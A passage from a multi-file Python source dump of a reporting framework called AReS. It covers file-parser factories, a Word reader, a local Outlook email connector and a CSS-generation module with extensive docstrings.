# data.forEach( function (rec) {
# var validLine = true ; %s ;
# if (validLine) { filteredData.push( rec ); }
# }); return filteredData ; ''' % ";".join(jsFilters))
#
# for container in self.aresObj.jsSources[self.htmlCode]['containers']:
# if container.category == 'Charts':
# dataComp = "DictToChart(%s(%s), %s, %s)" % (filterId, self.htmlCode, json.dumps(container.data.xAxis), json.dumps(container.data.seriesNames))
# else:
# dataComp = "%s(%s)" % (filterId, self.htmlCode)
# if getattr(container.data, 'dataFncs', None) is not None:
# for fnc in container.data.dataFncs:
# self.aresObj.jsGlobal.fnc("%s(data)" % fnc, DataFncChart.DATA_TRANS[fnc])
# dataComp = "%s(%s)" % (fnc, dataComp)
# for src in filterDefinition['src']:
# src['obj'].jsFrg(src['event'], container.jsGenerate(dataComp))
self.aresObj.jsGlobal.add(self.htmlCode, json.dumps(self.records(), cls=AresJsEncoder.AresEncoder))
return ''
def tableHeader(self, forceHeader=None, headerOptions=None):
if forceHeader is not None:
for header in forceHeader:
if 'format' not in header and 'className' not in header:
header['className'] = 'py_cssdivtextleft'
# The table does not work well when both are defined
if 'className' in header and 'class' in header:
header['className'] = "%s %s" % (header['className'], header['class'])
del header['class']
return forceHeader
#
colTypes = {}
# if self.dtypes is not None:
# print self.dtypes
# if not self.empty and self.dtypes == 'tuple':
# for hdr in self.headers:
# colTypes[hdr] = {'type': 'tuple'}
# elif not self.empty and self.dtypes == 'cell':
# for hdr in self.headers:
# colTypes[hdr] = {'type': 'cell'}
# else:
# colTypes = self.dtypes
if headerOptions is None:
headerOptions = {}
# headerMap will order and reduce the perimeter of columns
headerMap = {'orderCols': []}
for i, val in enumerate(self.dtypes):
colName = self.dtypes.index[i]
if val == 'float64':
row = {'data': colName, 'title': colName, 'format': 'float', "searchable": True}
elif val == 'bool':
row = {'data': colName, 'title': colName, 'display': 'checkbox', "searchable": True}
elif val == 'int64':
row = {'data': colName, 'title': colName, 'format': 'float', 'digits': 0, "searchable": True}
else:
row = {'data': colName, 'title': colName, 'className': 'py_cssdivtextleft', "searchable": True}
row.update(colTypes.get(colName, {}))
row.update(headerOptions.get(colName, {}))
headerMap[colName] = row
headerMap['orderCols'].append(colName) # This is to keep the header in the file
headers = []
for colName in headerOptions.get('fixedColumns', headerMap['orderCols'] ):
row = headerMap.get(colName)
if row is not None:
# The table does not work well when both are defined
if 'className' in row and 'class' in row:
row['className'] = "%s %s" % (row['className'], row['class'])
del row['class']
if 'factor' in row:
row['title'] = "%s (%s)" % (row.get('title', colName), row['factor'])
headers.append( row )
return headers
@property
def jsData(self): return self.htmlId
if __name__ == '__main__':
df = AresFileDataFrame(data=[["feef", "bfb"], ["vfv", "bfffsb"]], columns=['A', "V"], filePath=r'D:\BitBucket\Youpi-Ares\user_scripts\outputs\coucou\test.csv')
df.save()
```
#### File: connectors/files/AresFile.py
```python
import time
import logging
import inspect
import importlib
import os
from ares.Lib.AresImports import requires
DSC = {
'eng': '''
:dsc:
## File reader
This section will detail how to handle files and also how to force a particular file loading if the extension is not correct. As defined above some file extensions are predefined to be loaded by a specific class. The default one will just open the file and return it.
Most of the files will be opened using the Pandas interface. Please have a look at the [Pandas wrapper](/api?module=import&enum=package-pandas) for more details.
```python
aresObj.file(filename="")
# The path will be set by default in the output folder of the environment
aresObj.file(filename="", path="")
# In this example the path will be set to a specific directory.
# This will only work locally and cannot be used in server mode as the local file might be different
aresObj.file(filename="", path="", fileFamily=".doc")
# In this example the module used to read the file is overridden. The framework will not rely on the extension anymore
```
'''
}
# Factory for all the files
factory = None
def loadFactory(forceReload=False):
"""
:category: Files
:type: Factory
:rubric: PY
:dsc:
  This function will store all the different file parsers available in the Framework. The default file format used
  for the data is a Pandas [dataframe](https://fr.wikipedia.org/wiki/Pandas).
  In local runs this factory is reloaded after any change of script. In server mode the variable forceReload has to be
  used to refresh this factory.
:return: The Python factory
"""
global factory
if forceReload or factory is None:
tmp = {}
for script in os.listdir(os.path.dirname(__file__)):
try:
if script.startswith("AresFile") and script.endswith('py') and script != "AresFile.py":
for name, obj in inspect.getmembers(importlib.import_module("ares.Lib.connectors.files.%s" % script.replace(".py", "")), inspect.isclass):
exts = getattr(obj, '_%s__fileExt' % name, None)
if exts is not None:
for ext in exts:
tmp[ext] = obj
except Exception as err:
logging.warning("%s, error %s" % (script, err))
factory = tmp
return factory
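# Usage sketch (assuming a parser class declaring __fileExt = ['.csv'] lives in this folder):
#   parsers = loadFactory()
#   csvParser = parsers.get(".csv")
#   if csvParser is not None:
#     fileObj = csvParser(filePath=r"D:\data\sample.csv")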
class AresDataSource(object):
"""
:category: Default
:rubric: PY
:type: Data Source
:dsc:
:return: A Python Ares Dataframe like object
"""
__fileExt = None
def __init__(self, dataSrc, htmlCode, aresObj=None):
self.aresObj, self.htmlCode, self.headers = aresObj, htmlCode, []
self.aresObj.jsSources[htmlCode] = {"data": self, 'containers': []}
self.jsData, self.columns, self.dataSrc = "null", dataSrc.get('columns', []), dataSrc
def sort_values(self, by, inplace): pass
def attach(self, htmlObj):
"""
:category: Dataframe
:rubric: JS
:type: Front End
:dsc:
Attach the Dataframe to a HTML Object. This function is normally used in the different components in order
    to guarantee the link of the data. This will also ensure that the same data set will be stored only once in the page
"""
self.aresObj.jsSources[self.htmlCode]['containers'].append(htmlObj)
def tableHeader(self, forceHeader=None, headerOptions=None):
if self.columns is None:
return [{"data": "empty", 'title': "Empty table"}]
return self.columns
def jsEvent(self, debug=None):
"""
:category: Dataframe
:rubric: JS
    :type: Front End
    :dsc:
    Build the Javascript fragment which refreshes all the components attached to this data source.
:return: The Javascript string corresponding to the refresh of the different components
"""
jsGenerateFncs = []
for obj in self.aresObj.jsSources[self.htmlCode]['containers']:
jsGenerateFncs.append(obj.jsGenerate())
return self.aresObj.jsPost(self.dataSrc['url'], jsFnc=["%s = data" % self.htmlCode] + jsGenerateFncs, debug=debug)
def html(self):
jsGenerateFncs = []
for obj in self.aresObj.jsSources[self.htmlCode]['containers']:
jsGenerateFncs.append(obj.jsGenerate())
if self.dataSrc.get('on_init', False):
self.aresObj.jsOnLoadFnc.add(self.aresObj.jsPost(self.dataSrc['url'], jsFnc=["%s = data" % self.htmlCode] + jsGenerateFncs))
return ''
class AresFile(object):
"""
:category: Default
:rubric: PY
:type: File
:dsc:
  Unique interface for files in AReS. A factory will read the file according to the extension, but a specific
  parser can be forced with the fileFamily argument of the get() method.
"""
__fileExt, _extPackages = None, None
label = ''
def __init__(self, data=None, filePath=None, htmlCode=None, aresObj=None):
self.pkgs = {}
if self._extPackages is not None:
for name, package in self._extPackages:
self.pkgs[name] = requires(name, reason='Missing Package', install=package, autoImport=True, sourceScript=__file__)
self.aresObj, self.filePath, self.htmlCode, self._ares_data = aresObj, filePath, htmlCode, data
_, self.fileExtension = os.path.splitext(self.filePath) if filePath is not None else (None, None)
self.path, self.filename = os.path.split(filePath) if filePath is not None else (None, None)
@property
def exists(self):
return os.path.exists(self.filePath)
@property
def timestamp(self):
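    # NOTE: this property returns the current GMT time, not the file's modification time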
if self.exists:
return time.strftime("%Y%m%d_%H%M%S", time.gmtime())
def get(self, fileFamily=None, delimiter=None, **kwargs):
"""
    :category: Files
    :rubric: PY
    :type: Factory
    :dsc:
    Return the bespoke file object matching the extension (or the forced fileFamily) from the parsers factory.
    :return: A bespoke file object, or this generic AresFile object if no parser matches
"""
if delimiter == -1:
return self
facts = loadFactory()
if self._ares_data is not None:
# Force the use of Pandas in this case
return facts[".csv"](data=self._ares_data, filePath=self.filePath, aresObj=self.aresObj, htmlCode=self.htmlCode, **kwargs)
if fileFamily is not None:
return facts[fileFamily](data=self._ares_data, filePath=self.filePath, aresObj=self.aresObj, htmlCode=self.htmlCode, **kwargs)
if self.fileExtension.lower() in facts:
return facts[self.fileExtension](data=self._ares_data, filePath=self.filePath, aresObj=self.aresObj, htmlCode=self.htmlCode, **kwargs)
return self
def _read(self, toPandas=False, **kwargs):
"""
"""
return open(self.filePath)
def read(self, toPandas=False, **kwargs):
"""
"""
self._ares_data = self._read(toPandas, **kwargs)
return self._ares_data
def setFolder(self):
"""
"""
if not os.path.exists(self.path):
os.makedirs(self.path)
def write(self, data, **kwargs):
"""
    :category: Files
    :rubric: PY
    :type: Writer
    :dsc:
    Write data to the file. The default implementation does nothing; bespoke file classes should override it.
    :return: None
"""
pass
  def writeTo(self, fileFamily, filePath=None):
    """
    :dsc:
    Convert the file by delegating to the parser registered for the target extension.
    :return: The new file object, or None if no parser is registered for this extension
    """
    facts = loadFactory()
    if fileFamily.lower() in facts:
      if filePath is None:
        filePath = self.filePath.replace(self.fileExtension, fileFamily)
      return facts[fileFamily.lower()](filePath=filePath, aresObj=self.aresObj)
def html(self):
    print(' Not yet implemented for bespoke files')
return ""
def docEnum(aresObj, outStream, lang='eng'):
"""
"""
for ext, aresClass in loadFactory().items():
outStream.link(
" **%s** | %s" % (ext, aresClass.label.strip()), "api?module=file&alias=%s" % ext, cssPmts={"margin": "5px"})
if __name__ == '__main__':
file = AresFile(r'D:\youpi.json').get()
#value = {"grerg": "vergerg", "rvr": 2}
#file.write(value)
data = file.read()
#file = AresFile(r'D:\testimports\testScript.py').get()
#print file.read().DSC
file = AresFile(r'D:\BitBucket\Youpi-Ares\user_reports\EFEE\doc\index.amd').get()
data = file.read()
file.write(data)
#data = AresJsData.JsDataFrame(None, None, None, "\t", None, None, None, None, None, None, '.')
#file.write(data)
```
#### File: connectors/files/AresFileWord.py
```python
from ares.Lib.connectors.files import AresFile
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_docx = requires("docx", reason='Missing Package', install='python-docx', sourceScript=__file__)
class FileWord(AresFile.AresFile):
"""
:category: Connector
:rubric: PY
:type: class
  :label: Connector to read a Word document.
  :dsc:
  Connector to read a bespoke Word document and return the text of its paragraphs.
  From this connector there are also some features in order to ask the framework to "digest" the files to enrich the search engine with metadata.
  At this stage we are more working on the collection of metadata but the search engine will then leverage all this information.
  This module needs a Python package called python-docx. To install it you can run the command pip install python-docx.
  Once this is available to your Python environment this connector will work fine.
  :link python-docx Documentation: https://python-docx.readthedocs.io/en/latest/
"""
__fileExt = ['.doc', '.docx']
label = "Interface to deal with Word documents"
  def _read(self, toPandas=False, **kwargs):
doc = open(self.filePath, 'rb')
document = ares_docx.Document(doc)
doc.close()
return [para.text for para in document.paragraphs]
if __name__ == '__main__':
  docObj = FileWord(filePath=r'D:\ficheProjet.docx')
  print( docObj.read() )
```
#### File: connectors/models/TableauDbModels.py
```python
import sqlalchemy
class Model(object):
"""
"""
@staticmethod
def test():
"""
:return:
"""
return [sqlalchemy.Column('test', sqlalchemy.String(100), primary_key=True)]
```
#### File: connectors/sources/AresConnOutlook.py
```python
DSC = {
'eng':
'''
:dsc:
Generic Connector to retrieve data from an Outlook open application.
This script will parse the emails of the selected set of folders. Not all the mailbox will be scanned by default.
For security reasons this connector does not work in server mode, in order to avoid interacting with the mailbox of the
server. This could be used to locally retrieve information and then feed a centralised database.
The idea of this connector is to put in place specialised nodes in the network to get specific information, and only the results
will be shared
'''
}
from ares.Lib.connectors import AresConn
from ares.Lib.AresImports import requires
# Will automatically add the external library to be able to use this module
ares_pywin32 = requires("win32com.client", reason='Missing Package', install='pywin32', sourceScript=__file__)
class AresConnOutlook(AresConn.AresConn):
"""
:category: Outlook
:rubric: PY
:type: Connector
:example: print(aresObj.getData('OUTLOOK', {'folders': ['Example']}))
:Link Documentation: https://www.codementor.io/aliacetrefli/how-to-read-outlook-emails-by-python-jkp2ksk95
:dsc:
Connector to retrieve emails from an open Outlook session.
  The list of folders to be read should be defined; by default no folders will be used to extract emails.
  This could be a way to retrieve data from a mailing list to produce KPIs
"""
ALIAS = 'OUTLOOK'
@classmethod
def isCompatible(cls, params):
global ares_pywin32
if not params['is_local']:
      return (False,
        '<i class="fas fa-times-circle"></i> Outlook connector cannot be used if the script is not run locally')
if ares_pywin32 is None:
ares_pywin32 = requires("win32com.client", reason='Missing Package', install='pywin32', autoImport=True, sourceScript=__file__)
if ares_pywin32 is not None:
return (True, '<i class="far fa-check-square"></i> Available')
return (False, '<i class="fas fa-times-circle"></i> Credential missing <a style="color:red;text-decoration:underline;font-weight:bold;" href="/admin/account">Account Settings</a>')
@classmethod
def _getData(cls, params, sourceDef=None, **kwargs):
emails = []
outlook = ares_pywin32.Dispatch("Outlook.Application").GetNamespace("MAPI")
    accounts = ares_pywin32.Dispatch("Outlook.Application").Session.Accounts
for account in accounts:
inbox = outlook.Folders(account.DeliveryStore.DisplayName)
folders = inbox.Folders
for folder in folders:
if not str(folder) in params['folders']:
continue
messages = folder.Items
if len(messages) > 0:
          for message in messages:
            try:
              sender = message.SenderEmailAddress
              subject = message.Subject
              content = message.Body
              date = message.SentOn.strftime("%d-%m-%y")
              if sender != "":
                emails.append({'to': sender, 'subject': subject, 'body': content, 'date': date})
            except Exception as err:
              # Some Outlook items (e.g. meeting requests) do not expose the email attributes
              print("Error reading a message in %s: %s" % (account.DeliveryStore.DisplayName, err))
return emails
```
#### File: Lib/css/CssBase.py
```python
DSC = {
'eng': '''
:category: CSS Framework Design
:rubric: PY
:dsc:
## CSS Framework

CSS generator: this module will make it easier to add CSS classes and will also allow the creation of themes.
There are 4 CSS levels according to the need. Not all of them can be overridden without impacting the whole framework.
All the CSS configurations are using Python dictionaries based on any existing keys and values defined in the CSS standards [CSS W3C Documentation](https://www.w3schools.com/css/)
You can also get more details about this [here](https://www.w3.org/standards/webdesign/htmlcss)
**Please do not override or change any function starting with __**. If it is really needed please contact us before working on
your report. Those functions are intended to be internal functions that any child class should never need directly
### CSS Level 1
Parameters defined in the signature of the method calls in Ares.py
This level of CSS is very bespoke and users are invited to override them in the report directly by using the different
standardised keywords. For example:
- Color is used for the font-color CSS properties
- size for the font-size
...
You can validate your CSS Style [here](https://validator.w3.org/#validate_by_input)
Default values are common in the framework anyway. Those parameters are optional.
For example the below will change the color in the first record and the font size on the second one.
```python
aresObj.tabs([{'value': 'Fraise', 'key': 'Fraise', 'color': 'blue', 'isActive': True}, {'value': 'Apple', 'key': 'Apple', 'size': 20}])
```
### CSS Level 2
Parameters defined in the HTML Structure. Please have a look at the documentation in AresHtml.py for more details
about the HTML framework. The idea of this layer is not to be overridden. Basically it mainly covers style attributes in the
different HTML tags and those attributes are mandatory for the correct display of the HTML element.
Usually this CSS layer is not used in the simple HTML components. It is more likely used in the nested component to ensure
a correct structure
For example in the textBubble HTML String function it is defined:
```markdown
style="padding-top:5px;margin-left:5px;text-align:center;background-color:white"
```
### CSS Level 3
Python classes defined in the different CSS modules. Those modules can be used dynamically from the HTML component
using the method addPyCss and then by defining the class in the corresponding HTML element. Those CSS styles will be written directly by
python and it will add on the fly the needed CSS classes in the report header. This in the future will help us in selecting the
correct style (and it should be the most often used)
For example in the Slider class it is added the Python CSS Style CssSubTitle
```python
self.aresObj.jsOnLoadFnc.add('%s.slider({value: %s});' % (self.jqId, self.vals))
if self.title is not None:
self.aresObj.cssObj.add('CssSubTitle')
```
### CSS Level 4
Pure CSS Style coming from existing framework. For example [Bootstrap](https://getbootstrap.com/docs/3.3/css/) is coming with its complete suite of styles
and you can directly use them by defining the class name in the method addClass of your HTML component. Going forward this 4th CSS
usage should be reduced and the python layer should automatically generate CSS Styles for each report
For example in List we use the Bootstrap styles
```python
class List(AresHtml.Html):
cssCls = ['list-group']
```
'''
}
import os
import sys
import json
import collections
import logging
from ares.Lib import AresMarkDown
from ares.Lib.css import CssBaseColor
# The factory with all the different CSS classes available
# This can be reloaded if a new one is added
factory = None
def load(forceReload=False):
""" Load the factory with the all the different CSS classes defined in the framework """
global factory
if factory is None or forceReload:
path = os.path.abspath(__file__)
dirPath = os.path.dirname(path)
sys.path.append(dirPath)
tmpFactory = {}
for pyFile in os.listdir(dirPath):
if pyFile == 'CssBase.py':
continue
if pyFile.endswith(".py") and pyFile != '__init__.py':
try:
pyMod = __import__(pyFile.replace(".py", ""))
for name in dir(pyMod):
if name.startswith("Css"):
tmpFactory[str(name)] = {'class': getattr(pyMod, name), 'file': pyFile}
except Exception as e:
        # unexpected issue in the factory (a new class might be wrong)
logging.warning(e)
# TODO: Think about a better implementation
    # Atomic action to update the factory
# the above if statement should remain very quick as it might be a source of synchronisation issues in the future
factory = tmpFactory
return factory
def convertCss(content, isMin=False, formatted=False):
"""
:category: CSS Converter
:type: Style
:rubric: PY
:dsc:
Translate the CSS structure to the CSS Ares expected format.
  The result of this function is printed to the console. This function should not be used if you cannot see the output on the console.
"""
import re
cssResults = collections.defaultdict(list)
pattern = re.compile("[\n\t ]*([a-zA-Z-0-9:\\n\\t\,._ ]*){([a-zA-Z0-9;:()/\\n\\t-._ ]*)}", re.IGNORECASE | re.DOTALL | re.MULTILINE)
for match in pattern.finditer(content):
cssIdRaw, cssContent = match.groups()
cssIds = cssIdRaw.split(',')
cssContent = cssContent.replace("\t", " ")
for line in cssContent.split("\n"):
cleanLine = line.strip()
if cleanLine:
attr, value = cleanLine.split(":")
value = value.strip().replace(";", "")
for cssId in cssIds:
cssResults[cssId.strip()].append({'attr': attr, 'value': value})
for key, vals in cssResults.items():
print(key)
    if formatted:
for val in vals:
print(val)
else:
print(key, vals)
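# Usage sketch (hypothetical CSS input, one property per line):
#   convertCss(".title {\n color: red;\n font-size: 12px;\n}", formatted=True)
# prints the selector followed by one {'attr': ..., 'value': ...} record per property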
class CssStyle(list):
"""
:category: CSS
:rubric: PY
:type: constructor
:dsc:
  This is a proxy class to a list, dedicated to monitoring the CSS classes.
  The use of this class will help to manage the different possible attributes
  and also to add more flexibility going forward
"""
attrs = None
def append(self, paramsCss):
"""
:category: CSS Style Builder
:rubric: PY
:type: style
:example: >>> cssObj.append( {'attr': 'color'} )
:dsc:
Add parameters to the CSS Style generated from Python
:link CSS Class Documentation: https://www.w3schools.com/html/html_classes.asp
"""
if self.attrs is None:
self.attrs = set()
self.attrs.add(paramsCss['attr'])
super(CssStyle, self).append(paramsCss)
def update(self, params):
"""
:category: CSS Style Builder
:rubric: PY
:type: style
:example: >>> cssObj.update( {"color": "red"} )
:dsc:
Update an existing attribute to a Python CSS class
:link CSS Class Documentation: https://www.w3schools.com/html/html_classes.asp
"""
if self.attrs is None:
for attr, val in params.items():
self.append({'attr': attr, 'value': val})
else:
for attr, val in params.items():
if attr in self.attrs:
for rec in self:
if rec['attr'] == attr:
rec['value'] = val
break
else:
self.append({'attr': attr, 'value': val})
class CssObj(object):
"""
:category: CSS / Python Collection
:rubric: PY
:dsc:
CSS Object is the main Python wrapper used to create the on the fly CSS files
The idea will be to use this as the bespoke CSS file in a report. There will be nothing done outside of python in this
framework. Everything like CSS or Javascript will be automatically generated and defined from the components used in the
reports.
"""
minify = False # https://en.wikipedia.org/wiki/Minification_(programming)
def __init__(self, aresObj=None):
""" Instantiate the object and also load the CSS Python factory """
self.__factory, self.aresObj = load(), aresObj
self.cssStyles, self.cssBespoke = {}, {}
# The below dictionary is the only one used in the CSS Framework to set the colors
# This can be changed in order to get different color charts in a bespoke environment
self.colorCharts, self.cssMaker = {}, CssBaseColor.CssColorMaker(aresObj)
# TODO: Remove this special logic
self._charts = list(self.cssMaker.charts)
for color in self.cssMaker.colors:
self.colorCharts.setdefault( color['type'], []).append( color['color'])
self.__bespokeAttr = collections.defaultdict(dict)
def help(self, category=None, rubric=None, type=None, value=None, enum=None, section=None, function=None, lang='eng', outType=None):
outStream = AresMarkDown.DocCollection(self.aresObj)
if enum == 'colors':
outStream.title("Pre defined colors", cssPmts={"margin-left": "5px", "font-size": "30px", "font-variant": "small-caps"})
outStream.append("Colors used in AReS are based on hexadecimal codes. You can find the definition here: [W3C colors website](https://www.w3schools.com/colors/colors_hexadecimal.asp)")
outStream.hr()
CssBaseColor.docEnum(self.aresObj, outStream, lang)
outStream.hr()
outStream.title("Definition", level=2)
if hasattr(CssBaseColor, 'DSC'):
        docSection = AresMarkDown.AresMarkDown.loads(
          CssBaseColor.DSC.get(lang, CssBaseColor.DSC.get('eng', '')))
outStream.add(docSection, 'dsc')
elif enum == 'styles':
outStream.title("CSS Styles in AReS Components", level=2)
data = []
for alias, cssCls in load().items():
docDetails = AresMarkDown.AresMarkDown.loads(cssCls['class'].__doc__)
data.append( [alias, cssCls['file'], docDetails.getAttr('dsc').strip()] )
outStream.table(['pyCSS Class', 'Module', 'Description'], data, pmts={"searching": 'True'})
outStream.src(__file__)
outStream.export(outType)
def ovr(self, pyMod):
"""
:category: CSS / Python Overrides
:rubric: PY
:dsc:
    This will go through all the classes in the module to try to override the ones defined in the framework.
This entry is a shortcut to change CSS Styles without having to update the main framework.
Those changes will only impact the current report.
:tip:
If you create a module CssOvr.py in the root of your environment, all the CSS Classes will be automatically
loaded and if some already existing in the framework, they will be overridden.
"""
for name in dir(pyMod):
if name.startswith("Css") and name != 'CssBase':
self.cssBespoke[str(name)] = getattr(pyMod, name)
def addPy(self, pyCssCls):
"""
:category: Css Classes
:rubric: PY
:type: Framework Extension
:dsc:
Add a bespoke class to the CSS Style Factory. This class is added on the fly and it cannot override an existing one.
"""
cssCls = type(pyCssCls.__name__, (pyCssCls, CssCls), {})
if not pyCssCls.__name__ in self.__factory:
self.__factory[pyCssCls.__name__] = {'class': cssCls, 'file': 'external (%s)' % self.aresObj.run.report_name}
self.add(pyCssCls.__name__)
def addCls(self, clsName, params):
"""
:category: CSS / Python Collection
:rubric: PY
:dsc:
Function to define a CSS class on the fly from the Python layer.
:return: The Python CssCls object
"""
styles = [{'attr': key, 'value': val} for key, val in params.items()]
self.cssBespoke[clsName] = type(clsName, (CssCls, ), dict(__style=[]))()
self.cssBespoke[clsName].style = styles
self.cssStyles.update(self.cssBespoke[clsName].getStyles())
return self.cssBespoke[clsName]
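  # Usage sketch (hypothetical class name and attributes):
  #   aresObj.cssObj.addCls("CssMyTitle", {"color": "red", "font-size": "14px"})
  # registers a .py_cssmytitle class which can then be used by any HTML component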
def change(self, cssCls, name, value):
"""
:category: CSS / Python Overrides
:rubric: PY
:dsc:
Store the attributes to be changed / overridden for a given class
"""
self.__bespokeAttr[cssCls][name] = value
def reload(self):
"""
:category: CSS function
:rubric: PY
:dsc:
Force the CSS cache to be refreshed.
This should never be used locally as a simple change in the code will refresh all the caches as Flask will automatically restart
"""
self.__factory = load(forceReload=True)
def get(self, clsName):
"""
:category: CSS function
:rubric: PY
:dsc:
Returns the CSS attributes for a given Python class Name
:return: The Python CSS Object
"""
pyCss = self.cssBespoke[clsName] if clsName in self.cssBespoke else self.__factory.get(clsName, {}).get('class', None)
return pyCss
def add(self, clsName, htmlId=None, htmlTag=None, htmlType=None, cssRef=None):
"""
:category: CSS function
:rubric: PY
:dsc:
    Add the Python Class to the report CSS objects. The bespoke style overrides will be applied first. The defaults are the
    standard styles defined in the root of the CSS module
:return: The Python CSS Id (defined from the method setId in CssCls)
"""
cssMod = self.__factory.get(clsName, {}).get('class', None) if not clsName in self.cssBespoke else self.cssBespoke[clsName]
if cssMod is None:
return None
pyCss = cssMod(htmlId=htmlId, htmlTag=htmlTag, htmlType=htmlType, cssRef=cssRef)
pyCss.colorCharts = self.colorCharts
if clsName in self.__bespokeAttr:
for name, value in self.__bespokeAttr[clsName].items():
pyCss.update(name, value)
self.cssStyles.update(pyCss.getStyles())
return pyCss.cssId
def __str__(self):
"""
:category: CSS function
:rubric: PY
:dsc:
This function will be in charge of producing the best CSS content according to the need.
If minify is set to true it will have to try to create groups and to aggregate the data before writing a one liner
:return: The String with all the CSS classes and definition
"""
if self.minify:
return "".join([ "%s %s" % (key, val) for key, val in self.cssStyles.items() if val != '{}'])
    # no need to optimise for performance in the web report; this could be investigated later
return "\n".join(["%s %s" % (key, val) for key, val in self.cssStyles.items() if val != '{}'])
def getStyle(self, clsName):
"""
:category: CSS function
:rubric: PY
:dsc:
Get the CSS Attributes for a given Python CSS Class Name
:return: Return a String representing the CSS Attributes for a given Python CSS Class Name
"""
    if clsName in self.cssBespoke:
      return list(self.cssBespoke[clsName](None).getStyles().values())[0][1:-1]
    return list(self.__factory[clsName]['class'](None).getStyles().values())[0][1:-1]
def pyRef(self, clsName):
"""
:category: CSS function
:rubric: PY
:dsc:
Convert the CSS Class Name to a standardized Class Name within this Python Framework
:return: A string with the CSS converted name
"""
return 'py_%s' % clsName.lower()
def getClsTag(self, clsNames):
"""
:category: HTML function
:rubric: PY
:dsc:
Create the CSS Tag to be added to the HTML Element to consider the different classes.
This will only add a class tag with the list of class names defined.
:return: A string with the HTML Class information to add to the element
"""
return 'class="%s"' % " ".join([self.pyRef(clsName) for clsName in clsNames])
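  # e.g. getClsTag(["CssStdIcon", "CssBigIcon"]) returns 'class="py_cssstdicon py_cssbigicon"'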
class CssCls(object):
""" CSS Base class of all the derived styles
:category: CSS Class
:rubric: CSS
:dsc:
  Main class to create from the Python CSS Framework well defined CSS Fragments which will be added to the page.
  Each CSS Class created will produce a Class Name and it will be the one used in all the AReS components to set the Style.
  This module will only consider the Static CSS classes; all the bespoke CSS Styles used to define a component more specifically will
  be defined either in the string method of the component (old way) or in the jsStyle variable of the component (new way)
:TODO:
work on a way to optimize the CSS String generated in the header
example: http://www.cssportal.com/css-optimize/
"""
# This is a private function and it is not supposed to be updated
# please use the variable style in the class for any change
# It should be transformed ONLY in this class
# The structure of the dictionaries is using attr and value to be able to add some special
# keys in the future.
__style = None
reqCss = None # List of CSS Configurations required
preceedTag, parentTag, childrenTag, directChildrenTag, htmlTag = None, None, None, None, None
cssId = None # CSS Id
# Default values for the style in the web portal
colors10 = ['#5dd45d'] # the different colors used as reference in the framework
fontSize, headerFontSize = '14px', '18px'
# State variables, should have the same structure than __style
  # Those variables are the ones used directly so please do not change them
  # we use static variables to make it easier to retrieve them in the editor
# target is not implemented and this feature is done in the javascript
hover, active, checked, disabled, empty, enabled, focus, link, visited = 9 * [None]
  # Item CSS selector, should also have the same structure as __style
before, after = None, None
childKinds = None
def __init__(self, htmlId=None, htmlTag=None, htmlType=None, cssRef=None):
""" Instantiate a CSS object with the different possible classes to be used in the style of the components
"""
if self.htmlTag is not None:
htmlTag = self.htmlTag
self.setId(htmlId=htmlId, htmlTag=htmlTag, htmlType=htmlType, cssRef=cssRef)
self.style = CssStyle()
for l in getattr(self, "_%s__style" % self.__class__.__name__, {}):
self.style.append(dict(l))
# To add some special features required for this component.
# This is to avoid having to put multiple times the same line of CSS in each class
# This will simplify a lot the testing
if self.reqCss is not None:
for css in self.reqCss:
for l in getattr(css, "_%s__style" % css.__name__, []):
self.style.append(dict(l))
# Store the different CSS Styles defined in the python layer to dictionaries
# This will allow the fact that some bespoke configuration can inherit from the main configuration
    # but some special attributes might be overridden.
# It is not possible to change this differently from the components as it is supposed to be
# static and it will be used as a text file in the future
# If more overrides are needed please use the function .css() available in the components
# or talk to your IT team in charge of this framework
self.eventsStyles = {}
for state in ['hover', 'active', 'checked', 'disabled', 'empty', 'enabled', 'focus', 'link', 'visited', 'after', 'before']:
if getattr(self, state, None) is not None:
self.eventsStyles[state] = CssStyle()
for rec in getattr(self, state):
self.eventsStyles[state].append(dict(rec))
    # To add CSS Styles like tr:nth-child(even)
if self.childKinds is not None:
if not isinstance(self.childKinds, list):
self.childKinds = [self.childKinds]
for childKind in self.childKinds:
childValue = "%(type)s%(value)s" % childKind
self.eventsStyles[childValue] = CssStyle()
for rec in childKind['style']:
self.eventsStyles[childValue].append(dict(rec))
def customize(self, style, eventsStyles):
"""
:category: CSS Class override
:rubric: CSS
:dsc:
    Function defined to override or define the static CSS parameters when a CSS Style python object is instantiated.
    This will allow for example to define the color according to the standard ones without hard coding them.
    In the base class this method does nothing
"""
pass
# -------------------------------------------------------------------------------
# CSS SELECTORS
#
# https://www.w3schools.com/cssref/css_selectors.asp
# -------------------------------------------------------------------------------
def __states(self):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
Function used to define for a given class name all the different mouse and event properties that the CSS could allowed.
This private method will check the static definition and create the entry in the Python CSS Class.
This will allow to define in the framework some events like hover, focus...
Only the following selector are defined so far ('hover', 'active', 'checked', 'disabled', 'empty', 'enabled', 'focus', 'link', 'visited', 'after', 'before')
:link W3C Documentation: https://www.w3schools.com/cssref/css_selectors.asp
:link W3C Hover example: https://www.w3schools.com/cssref/sel_hover.asp
"""
cssEvent = {}
for state, cssRecord in self.eventsStyles.items():
if state in ['before', 'after']:
cssEvent["%s::%s" % (self.cssId, state)] = self.cssData(cssRecord)
else:
cssEvent["%s:%s" % (self.cssId, state)] = self.cssData(cssRecord)
return cssEvent
# -------------------------------------------------------------------------------
# CSS ID SYNTHAX
#
# https://www.w3schools.com/css/css_syntax.asp
# -------------------------------------------------------------------------------
def ispreceedBy(self, tag):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
Tag at the same level but defined just before this one
"""
self.preceedTag = tag
def hasParent(self, parentTag):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
HTML tag parent of this one. For example TR is parent of TD
"""
self.parentTag = parentTag
def addChildrenTags(self, tags):
"""
:category: CSS Class Style Builder
:rubric: CSS
:dsc:
    HTML tags children of this one. For example TD is a child of TR
"""
if self.childrenTag is None:
self.childrenTag = tags
else:
self.childrenTag.extend(tags)
@property
def classname(self):
"""
:category: CSS function
:rubric: PY
:dsc:
Property to convert the CSS Class Name to a standardized Class Name within this Python Framework
:return: A string with the converted name
"""
return "py_%s" % self.__class__.__name__.lower()
def setId(self, htmlId=None, htmlTag=None, htmlType=None, cssRef=None):
"""
:category: CSS function
:rubric: PY
:dsc:
Global method to define the CSS ID for a given CSS Configuration class
:return: The CSS Id as a String
"""
if cssRef:
      # Shortcut to set directly the name of the CSS class
self.cssId = cssRef
return cssRef
cssIdParts = []
if self.parentTag is not None:
cssIdParts.append("%s > " % self.parentTag)
elif self.preceedTag is not None:
